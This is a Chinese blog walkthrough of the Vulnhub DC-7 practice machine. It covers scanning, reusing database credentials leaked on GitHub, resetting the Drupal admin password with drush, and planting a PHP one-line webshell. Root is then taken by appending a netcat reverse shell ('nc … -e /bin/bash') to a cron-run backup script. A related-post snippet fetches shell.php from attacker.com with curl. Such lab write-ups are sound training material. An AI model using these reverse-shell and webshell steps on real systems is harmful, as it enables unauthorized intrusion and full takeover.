DC-7完整渗透流程

最新推荐文章于 2024-05-11 21:27:20 发布
最新推荐文章于 2024-05-11 21:27:20 发布
阅读量277 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/119463911
版权

0x00 环境介绍

考点:一句话木马,环境不多说了,接下来是一整个正确的渗透流程。

0x01 信息收集

1)IP收集

arp-scan -l

2)端口扫描

nmap -A -p- 192.168.213.149

3)目录扫描-

dirb 192.168.213.149

0x02 渗透攻击

访问web页面,发现作者留下的提示显示:
大概意思“通过字典暴力破解介乎不可能完成,需要跳出“框架””,这里所指的框架便是作者的Twitter账号,下面发现链接地址,下载源码
下载源码
获取到账户密码,尝试后确认为ssh连接账号

<?php
  $servername = "localhost";
  $username = "dc7user";
  $password = "MdR3xOgB7#dW";
  $dbname = "Staff";
  $conn = mysqli_connect($servername, $username, $password, $dbname);
?>

登录ssh
登录ssh
发现突破口
突破口
drush为该网站的网站管理指令,可以通过该命令给网站后台添加一个用户名和密码
该命令必须在指定网站目录下使用,kali不具备该命令

drush user-password  admin --password=123

创建后台账号
登录后台,发现命令注入漏洞,
思路:通过创建文章写入一句话木马
后台页面
文章管理页面
缺php插件
添加php插件,便于写入php一句话木马

添加pph插件
选用插件
使用插件
启动插件
出现php格式
linux安装蚁剑
安装shell工具
写入木马
php一句话木马
shell连接
连接

0x03 权限提升

靶机~下mbox查看到提示邮件,该邮件15分钟执行一次
15分钟执行一次
将nc root连接写入脚本,等待十五分钟执行,kali先准备接受
注意:注意shell里面不是编程,不需要双引号

kali:1.nc -lvvp 6666
靶机: 2.echo nc 192.168.213.129 6666 -e /bin/bash >> /opt/scripts/backups.sh

写入nc连接
稍微等待,反弹成功,获取root权限,交互命令,查看flag
渗透完成

完整思路完成!

告白热
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机:DC-7渗透详细过程
IerkeU的博客
03-20 1058
DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场需要具备中级的渗透测试技巧,这并不是一个很有技术性的挑战,但也不能算容易。渗透测试的和之前的 DC 靶机(哪一台就不知道了)有相似的地方,但会涉及到一些新东西,你的最终目标是放在roo
DC-7靶机详细渗透步骤
wwxxss
11-04 661
DC7详细的渗透的步骤,它跳出了之前的思维,提供了我们还有源码泄露漏洞,希望大家能理解步骤
DC-7靶机详细渗透过程
MRS_jianai的博客
12-02 255
DC-7靶机渗透教程
2024年网络安全最全【DC-7靶场渗透】(2),人生转折
最新发布
2401_84301389的博客
05-11 615
本期做一下DC7靶场。
DC-7靶机渗透
m0_62008601的博客
06-02 1035
dc-7靶机的渗透过程
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 6000
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
DC-7靶机渗透测试详细教程
啊醒的博客
05-04 1072
DC-7靶机渗透测试详细教程
9.100个渗透测试实战#9(DC-4)
01-09
世间一切皆可努力  感谢浏览 目录 ...二、实验流程 三、实验步骤 (一)信息收集——主机发现阶段 1.查看kali的网卡、IP等信息;(网卡名:eth0,IP地址:192.168.97.129) 2.查看靶机页面; 3.探测特
PurpleCloud:云中的小型Active Directory渗透测试实验室的基础架构即代码(IaC)部署。 部署模拟具有DC和终结点的半现实公司企业Active Directory。 紫色团队的目标包括蓝色团队检测能力和用于检测工程新方法的研发
01-28
即PurpleCloud,是一个专为云环境设计的小型Active Directory渗透测试实验室,它采用基础架构即代码(Infrastructure as Code, IaC)的模式,便于快速、高效地部署模拟半真实企业的环境,包括域控制器(DC)和终端...
教育机器人商业计划书-701dc0f22af90242a895e5f6.zip
12-07
- 生产计划:制定生产流程和时间表,确保产品质量和交货期。 - 销售与分销:构建销售网络,考虑线上电商平台和线下实体店的布局。 - 合作伙伴:寻找战略合作伙伴,如技术供应商、内容提供商、教育机构等。 5. ...
开源产业白皮书-DCOS.pdf
10-10
2. 市场普及率提升:随着企业对云计算和容器技术理解的加深,DC/OS 的市场渗透率将持续增长。 3. 标准与应用场景制定:统一的标准和应用场景将有助于推动 DC/OS 在更多行业的广泛应用。 七、DC/OS 应用案例 中国...
信息安全_domain.trust.pr0mise.pptx
08-14
一个域内的所有对象共享相同的DNS区域,并通过域控制器(Domain Controller, DC)进行身份验证和授权。林是多个域的集合,它们共享相同的全局编录(Global Catalog)和架构,允许不同域间的通信。林根域是林中的顶级...
渗透项目】靶机DC-7渗透过程
命运的旋律的博客
05-10 690
信息收集 主机发现 靶机测试常规起手式:) nmap -sn 192.168.72.0/24 -sn和-sP都是对主机进行ping扫描 端口扫描 nmap -Pn -T4 -A -v -p- 192.168.189.137 --script=vuln 网站指纹扫描 通过网站指纹扫描发现该网站的中间件使用了apache2.4.25,使用的CMS是Drupal 8 python3 cmseek.py -u 192.168.189.137 使用searchsploit和msfconsole也没
dc-7 靶机渗透学习
..
03-23 3902
信息收集 扫描当前网段 nmap -sP 192.168.202.0/24 查看开启的端口服务 nmap -A -p- -v 192.168.202.146 访问靶机的80端口,通过Wappalyzer识别出是Drupal 8 先看一下靶机的说明 不是技术性的?跳出框框去思考?ememm,那先观看一下网站的特点吧。 对比新搭建的Drupal框架,发现在最下方多了一个@DC7USER。 去谷歌搜索一下@DC7USER,发现了一个Dc7...
vulnhub渗透测试靶机DC-7
weixin_46128614的博客
01-19 455
下载地址:https://www.vulnhub.com/entry/dc-7,356/ nmap -sT -sV -p- -T5 192.168.49.21 我们进到80端口,作者提示我们不是爆破和字典攻击,让我们跳出box 在左下角留了一个用户,应该是Twitter的,老外都爱用Twitter 果然 我们把github上的内容下载下来,查看到了一个配置文件给到了一个账号和密码 dc7u...
DC7打靶思路整理
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
01-19 3140
风萧萧兮易水寒,壮士一去兮不复还。 —— 佚名《荆轲歌.渡易水歌》 一、信息收集 在不知道目标靶机的情况下,我们先来个主机发现,我们这里使用nmap来进行: 排除掉常用的那些IP,剩下了就是我们的靶机IP了,然后继续使用nmap进行端口扫描,发现只开放了SSH和http服务: 访问目标靶机的web服务,根据wappalyzer收集到的信息显示,目标系统使用的CMS是Drupal8: 二、外围打点 既然基本的信息收集已经有了,那就先上神器xray进行漏洞扫描但是除了扫描出几个文件来,其他毫无所获。 .
DC-7渗透实战
qq_43462485的博客
10-31 255
DC-7实战 攻击机:kali 192.168.80.130 目标机:dc-7 192.168.80.132 一、信息收集 1.使用arp-scan -l进行主机发现,使用nmap进行端口扫描 2.访问web界面,发现是一个drupal的网站,还有一个提示 3.使用nikto扫描一下网站,发现了一个登陆页面 4.丝毫没有头绪,参考一下大佬文章发现网站下面有个用户名,百度一下 发现在这个配置文件下有个源码,好像是数据库的账号密码,但是刚刚只扫到了80和22端口 .
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1216
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
DC靶机系列——DC-7练习
shenpanzhimao的博客
03-01 869
DC靶机系列——DC-7练习 DC-7的端口服务只有22和80端口,也就是ssh登录和web服务。 在探测web服务的过程中,没有找到相应的web漏洞。 这里就要想办法通过侧面来进攻,考验的是对信息的敏感性。发现有一个@DC7USER,放在谷歌搜索一下,发现一个twitter和github,在github里面存在敏感信息,猜测可能是ssh的密码,果然进入。 获取初步权限后,继续在低权限情况下进行信...
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值